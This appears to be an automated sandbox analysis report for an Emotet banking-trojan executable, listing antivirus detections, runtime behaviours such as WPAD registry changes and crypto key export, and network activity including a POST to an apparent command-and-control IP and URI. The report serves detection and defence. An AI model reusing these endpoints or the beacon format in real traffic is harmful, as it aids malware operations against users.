6.6
High risk

035ae1de68972b25c8533db5e5bcce38808ed01c1c85051b641e429d88ef5b39

c8b8abaff59781669ab8f6348b0e5376.exe

Analysis duration

77s

Latest analysis

File size

540.1KB
Static detection Dynamic detection 100% AI SCORE=83 AMGMEUUCPFG ATTRIBUTE BANKERX BSCOPE CLASSIC CONFIDENCE EMOTET GENCIRC GENERICKDZ GENETIC GENKRYPTIK HGIASOCA HIGH CONFIDENCE HIGHCONFIDENCE HTKYLK KCLOUD MALWARE@#N1PVD59GVUNS QCXT R + TROJ R349766 SCORE SUSGEN TROJAN2 TROJANBANKER UNSAFE WUKDQ
Hawkeye Engine
Not detected: no Hawkeye Engine detection results yet
Static verdict
Antivirus engines
Scan engine Scan result Scan time Engine version
McAfee Emotet-FQS!C8B8ABAFF597 20210222 6.0.6.653
Alibaba Trojan:Win32/Emotet.05f1404a 20190527 0.3.0.5
Avast Win32:BankerX-gen [Trj] 20210222 21.1.5827.0
Baidu 20190318 1.0.0.2
Kingsoft Win32.Troj.Banker.(kcloud) 20210222 2017.9.26.565
Tencent Malware.Win32.Gencirc.10cdf98b 20210222 1.0.0.1
CrowdStrike win/malicious_confidence_100% (W) 20210203 1.0
Static indicators
Queries for the computer name (1 event)
Time & API Arguments Status Return Repeated
1620897738.588822
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 events)
Time & API Arguments Status Return Repeated
1620897722.588822
CryptGenKey
crypto_handle: 0x003cb8f0
algorithm_identifier: 0x0000660e ()
provider_handle: 0x003145c0
flags: 1
key: fÓSÚPÁRn™ ŽTriÖ
success 1 0
1620897738.604822
CryptExportKey
crypto_handle: 0x003cb8f0
crypto_export_handle: 0x003cb798
buffer: f¤jW¦Yi]­EUuXÝHÓ¡ídÓ!ƒ%ÍØî˞SA~`S2îf*Ëk×ÈÒøhù[ËwP£?#I¶„§Ö ³?ƒ3fÊ{=¶MúuQ²9Ön6]滨Bg…
blob_type: 1
flags: 64
success 1 0
1620897774.760822
CryptExportKey
crypto_handle: 0x003cb8f0
crypto_export_handle: 0x003cb798
buffer: f¤*\jVÞFÊÐ= 4û".ŽÁ’÷⩺T9”¨lßFû¨¾A³EÉxk*-‰¯B•›}¦‹±“×ö£LùïaåK¼(í¹ Û3:­{ F⍧ž•VëÎi·á&
blob_type: 1
flags: 64
success 1 0
1620897779.447822
CryptExportKey
crypto_handle: 0x003cb8f0
crypto_export_handle: 0x003cb798
buffer: f¤MÌiÍç‰Pè_¤vÅa€{’ÿ]Á4l¨JÜ/ö ¢´g½Ú,'Wº‰q*ñ“î<wî\“‚ }.ٜ0VS œV›üjˆ)R¹xU¸ Ë`Á‹WÙ*o˪ápm>­d9
blob_type: 1
flags: 64
success 1 0
1620897783.244822
CryptExportKey
crypto_handle: 0x003cb8f0
crypto_export_handle: 0x003cb798
buffer: f¤1Ô½­Ð+V€ú5ât¡›'Õçµ:dÖ jp¼hþ_ex>œ3—½v¸,pR÷•`åÊëIƔÅCQÏ:VHÑ]¶óÏg°Ú’©Eø+%xÇW|*ݜ*û#»NEéÌ|)Ë
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 event)
packer Armadillo v1.71
Behavioral verdict
Dynamic indicators
Allocates read-write-execute memory (usually to unpack itself) (1 event)
Time & API Arguments Status Return Repeated
1620897722.104822
NtAllocateVirtualMemory
process_identifier: 3060
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01e30000
success 0 0
Searches running processes, potentially to identify processes for sandbox evasion, code injection or memory dumping (1 event)
Checks adapter addresses, which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1620897739.119822
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 event)
process c8b8abaff59781669ab8f6348b0e5376.exe
Reads the system's User Agent and subsequently performs requests (1 event)
Time & API Arguments Status Return Repeated
1620897738.791822
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with hosts for which no DNS query was performed (7 events)
host 134.209.193.138
host 162.144.42.60
host 172.217.24.14
host 24.26.151.3
host 68.183.233.80
host 203.208.40.98
host 203.208.41.33
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 events)
Time & API Arguments Status Return Repeated
1620897741.697822
RegSetValueExA
key_handle: 0x00000394
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620897741.697822
RegSetValueExA
key_handle: 0x00000394
value: p5ÇÝH×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620897741.697822
RegSetValueExA
key_handle: 0x00000394
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620897741.697822
RegSetValueExW
key_handle: 0x00000394
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620897741.697822
RegSetValueExA
key_handle: 0x000003ac
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620897741.697822
RegSetValueExA
key_handle: 0x000003ac
value: p5ÇÝH×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620897741.697822
RegSetValueExA
key_handle: 0x000003ac
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1620897741.729822
RegSetValueExW
key_handle: 0x00000390
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
File has been identified by 56 AntiVirus engines on VirusTotal as malicious (50 out of 56 events)
Elastic malicious (high confidence)
DrWeb Trojan.Emotet.1005
MicroWorld-eScan Trojan.GenericKDZ.69772
FireEye Generic.mg.c8b8abaff5978166
McAfee Emotet-FQS!C8B8ABAFF597
Cylance Unsafe
Zillya Trojan.Emotet.Win32.27695
Sangfor Trojan.Win32.Emotet.PED
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/Emotet.05f1404a
K7GW Riskware ( 0040eff71 )
Cybereason malicious.ff5978
Arcabit Trojan.Generic.D1108C
Cyren W32/Trojan2.QCXT
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:BankerX-gen [Trj]
ClamAV Win.Keylogger.Emotet-9775410-0
Kaspersky HEUR:Trojan-Banker.Win32.Emotet.pef
BitDefender Trojan.GenericKDZ.69772
NANO-Antivirus Trojan.Win32.Emotet.htkylk
Paloalto generic.ml
Rising Trojan.Emotet!1.CB4A (CLASSIC)
Ad-Aware Trojan.GenericKDZ.69772
Sophos Mal/Generic-R + Troj/Emotet-CMC
Comodo Malware@#n1pvd59gvuns
F-Secure Trojan.TR/Emotet.wukdq
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition Emotet-FQS!C8B8ABAFF597
Emsisoft Trojan.GenericKDZ.69772 (B)
Jiangmin Trojan.Banker.Emotet.ofu
eGambit Generic.Malware
Avira TR/Emotet.wukdq
MAX malware (ai score=83)
Antiy-AVL Trojan[Banker]/Win32.Emotet
Kingsoft Win32.Troj.Banker.(kcloud)
Gridinsoft Trojan.Win32.Emotet.oa
Microsoft Trojan:Win32/Emotet.PED!MTB
AegisLab Trojan.Win32.Emotet.L!c
ZoneAlarm HEUR:Trojan-Banker.Win32.Emotet.pef
GData Trojan.GenericKDZ.69772
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.Emotet.R349766
VBA32 BScope.TrojanBanker.Emotet
ALYac Trojan.Agent.Emotet
Malwarebytes Emotet.Trojan.Stealer.DDS
ESET-NOD32 Win32/Emotet.CD
Tencent Malware.Win32.Gencirc.10cdf98b
Yandex Trojan.GenKryptik!AmgmeuuCpfg
Ikarus Trojan-Banker.Emotet
Connects to IP addresses that are no longer responding to requests (legitimate services usually remain up and running) (3 events)
dead_host 162.144.42.60:8080
dead_host 24.26.151.3:80
dead_host 192.168.56.101:49185
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Runtime screenshots
No runtime screenshots: no screenshots were generated while this sample ran


PE Compile Time

2020-08-28 00:19:03

Imports

Library MFC42.DLL:
0x419090
0x419094
0x419098
0x41909c
0x4190a0
0x4190a4
0x4190a8
0x4190ac
0x4190b0
0x4190b4
0x4190b8
0x4190bc
0x4190c0
0x4190c4
0x4190c8
0x4190cc
0x4190d0
0x4190d4
0x4190d8
0x4190dc
0x4190e0
0x4190e4
0x4190e8
0x4190ec
0x4190f0
0x4190f4
0x4190f8
0x4190fc
0x419100
0x419104
0x419108
0x41910c
0x419110
0x419114
0x419118
0x41911c
0x419120
0x419124
0x419128
0x41912c
0x419130
0x419134
0x419138
0x41913c
0x419140
0x419144
0x419148
0x41914c
0x419150
0x419154
0x419158
0x41915c
0x419160
0x419164
0x419168
0x41916c
0x419170
0x419174
0x419178
0x41917c
0x419180
0x419184
0x419188
0x41918c
0x419190
0x419194
0x419198
0x41919c
0x4191a0
0x4191a4
0x4191a8
0x4191ac
0x4191b0
0x4191b4
0x4191b8
0x4191bc
0x4191c0
0x4191c4
0x4191c8
0x4191cc
0x4191d0
0x4191d4
0x4191d8
0x4191dc
0x4191e0
0x4191e4
0x4191e8
0x4191ec
0x4191f0
0x4191f4
0x4191f8
0x4191fc
0x419200
0x419204
0x419208
0x41920c
0x419210
0x419214
0x419218
0x41921c
0x419220
0x419224
0x419228
0x41922c
0x419230
0x419234
0x419238
0x41923c
0x419240
0x419244
0x419248
0x41924c
0x419250
0x419254
0x419258
0x41925c
0x419260
0x419264
0x419268
0x41926c
0x419270
0x419274
0x419278
0x41927c
0x419280
0x419284
0x419288
0x41928c
0x419290
0x419294
0x419298
0x41929c
0x4192a0
0x4192a4
0x4192a8
0x4192ac
0x4192b0
0x4192b4
0x4192b8
0x4192bc
0x4192c0
0x4192c4
0x4192c8
0x4192cc
0x4192d0
Library MSVCRT.dll:
0x4192ec _except_handler3
0x4192f0 _setmbcp
0x4192f4 __CxxFrameHandler
0x4192f8 _EH_prolog
0x4192fc memset
0x419300 strlen
0x419304 _ftol
0x419308 _mbsnbcpy
0x41930c _wcslwr
0x419310 malloc
0x419314 _mbsstr
0x419318 __dllonexit
0x41931c _onexit
0x419320 _exit
0x419324 _XcptFilter
0x419328 exit
0x41932c _acmdln
0x419330 __getmainargs
0x419334 _initterm
0x419338 __setusermatherr
0x41933c _adjust_fdiv
0x419340 __p__commode
0x419344 __p__fmode
0x419348 __set_app_type
0x41934c _controlfp
Library KERNEL32.dll:
0x419058 GetStartupInfoA
0x41905c GetModuleHandleA
0x419060 ExitProcess
0x419064 GetLastError
0x419068 VirtualAlloc
0x41906c FreeLibrary
0x419070 LoadLibraryA
0x419078 lstrcpyA
0x41907c WinExec
0x419080 lstrlenA
0x419084 GetProcAddress
0x419088 lstrcatA
Library USER32.dll:
0x419360 LoadIconA
0x419364 InSendMessage
0x419368 CreateWindowExA
0x41936c ShowWindow
0x419370 KillTimer
0x419374 SetWindowLongA
0x419378 GetIconInfo
0x41937c SetTimer
0x419380 PtInRect
0x419384 ScreenToClient
0x419388 GetMessagePos
0x41938c IsWindow
0x419390 CopyIcon
0x419394 LoadCursorA
0x419398 GetDC
0x41939c CreateIconIndirect
0x4193a0 EnableWindow
0x4193a4 FillRect
0x4193a8 DrawStateA
0x4193ac GetClientRect
0x4193b0 CopyRect
0x4193b4 FrameRect
0x4193b8 InflateRect
0x4193bc GetSysColor
0x4193c0 OffsetRect
0x4193c4 DrawFocusRect
0x4193c8 GetWindowRect
0x4193cc GetSubMenu
0x4193d0 TrackPopupMenuEx
0x4193d4 PostMessageA
0x4193d8 ClientToScreen
0x4193dc WindowFromPoint
0x4193e0 GetActiveWindow
0x4193e4 InvalidateRect
0x4193e8 LoadMenuA
0x4193ec ReleaseDC
0x4193f0 LoadImageA
0x4193f4 SetCursor
0x4193f8 GetParent
0x4193fc GetNextDlgTabItem
0x419400 SendMessageA
0x419404 GetWindowLongA
0x419408 DestroyIcon
0x41940c DestroyCursor
0x419410 DestroyMenu
0x419414 MessageBeep
Library GDI32.dll:
0x41901c CreateFontIndirectA
0x419020 GetObjectA
0x419024 GetPixel
0x419028 SetPixel
0x41902c CreateBitmap
0x419030 DeleteObject
0x419034 GetStockObject
0x419038 SelectObject
0x419040 CreateCompatibleDC
0x419044 BitBlt
0x419048 DeleteDC
0x41904c SetTextColor
0x419050 SetBkColor
Library ADVAPI32.dll:
0x419000 RegQueryValueA
0x419004 RegOpenKeyExA
0x419008 RegCloseKey
Library SHELL32.dll:
0x419354 ShellExecuteExA
0x419358 ShellExecuteA
Library COMCTL32.dll:
0x419010 _TrackMouseEvent
Library MSVCP60.dll:

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49187 134.209.193.138 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://134.209.193.138:443/lDBb/0mCoFD/hjiTbwZ3CHcy3hNx/
POST /lDBb/0mCoFD/hjiTbwZ3CHcy3hNx/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------48faa8ad497c335a2d27a96a7b95614f
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 134.209.193.138:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.